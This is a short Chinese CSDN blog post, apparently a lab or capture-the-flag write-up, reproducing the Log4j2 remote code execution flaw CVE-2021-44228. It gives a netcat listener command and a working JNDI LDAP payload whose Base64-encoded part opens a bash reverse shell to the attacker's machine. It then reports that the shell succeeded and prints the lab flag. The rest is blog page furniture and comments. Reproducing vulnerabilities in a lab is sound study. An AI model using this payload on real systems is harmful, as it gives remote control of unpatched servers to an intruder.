CVE-2021-44228——Log4j2远程命令执行

c0rdXy

于 2023-09-25 14:17:24 发布

阅读量92

点赞数

文章标签： java 网络安全 log4j web安全

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/cardistry12138/article/details/133272023

版权

在这里插入图片描述
在kali上使用JNDIExploit-1.2-SNAPSHOT开启ldap服务

同时开启监听

nc -lvnp 8888

POC:

${jndi:ldap://192.168.59.128:1389/TomcatBypass/Command/Base64/L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTkuMTI4Lzg4ODggMD4mMQ==}

使用burp重发数据
在这里插入图片描述
反弹shell成功

得到flag

flag-{bmhfd9d608d-02eb-4eee-bd0f-410165a7f16c}

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
CVE-2021-44228——Log4j2远程命令执行

Log4j2远程命令执行（CVE-2021-44228）
复制链接

扫一扫

c0rdXy CSDN认证博客专家 CSDN认证企业博客

码龄4年

24: 原创

105万+: 周排名

21万+: 总排名

2万+: 访问

: 等级

262: 积分

49: 粉丝

12: 获赞

6: 评论

99: 收藏

私信

关注

热门文章

分类专栏

漏洞复现 3篇
渗透测试 4篇
Python 10篇
Web安全 4篇
前端 2篇
Java 1篇
自动化工具 1篇

最新评论

Java反序列化利用链之URLDNS链
CSDN-Ada助手: 恭喜博主撰写了第20篇博客！标题"Java反序列化利用链之URLDNS链"听起来非常有趣和富有挑战性。我对您对这一主题的深入探索感到钦佩，您的知识和经验无疑会为读者带来很大的收益。我希望未来您能继续分享关于Java反序列化和利用链的有趣话题。对于下一步的创作建议，也许您可以探索一些实际案例，或者分享一些最佳实践，让读者更好地理解如何应对这些潜在安全风险。期待您的下一篇博客！
外网打点到内网域
CSDN-Ada助手: 恭喜您撰写了第19篇博客！标题“外网打点到内网域”很吸引人，我非常期待阅读您的文章。您对外网与内网之间的连接问题进行探讨，无疑对网络安全领域的读者有很大帮助。希望您能进一步展开讲解，探索更多与内网域相关的主题，比如网络隔离、流量监测等。期待您的下一步创作，谢谢您的分享！
冰蝎Behinder打不开，没有反应怎么解决
CSDN-Ada助手: 恭喜您写了第17篇博客！对于冰蝎Behinder打不开的问题，我想分享一些建议。首先，您可以尝试重新下载和安装该软件，确保您使用的是最新版本。其次，检查您的防火墙和安全软件设置，可能是它们阻止了该软件的运行。此外，您还可以尝试在不同的设备上运行该软件，以确定是否与特定设备有关。请记住，这些只是一些可能的解决方案，因为我对该软件的了解有限。希望我的建议能对您有所帮助，并期待您未来更多精彩的博客创作！
Windows与Linux基本系统配置文件常见路径
Gemini要加油: 希望你不是在胡说八道
Python基础——第八章：Python文件操作
小群吖: 怎么把记事本的文字读取到pycharm中呢？

您愿意向朋友推荐“博客详情页”吗？

强烈不推荐
不推荐
一般般
推荐
强烈推荐

提交

最新文章

目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。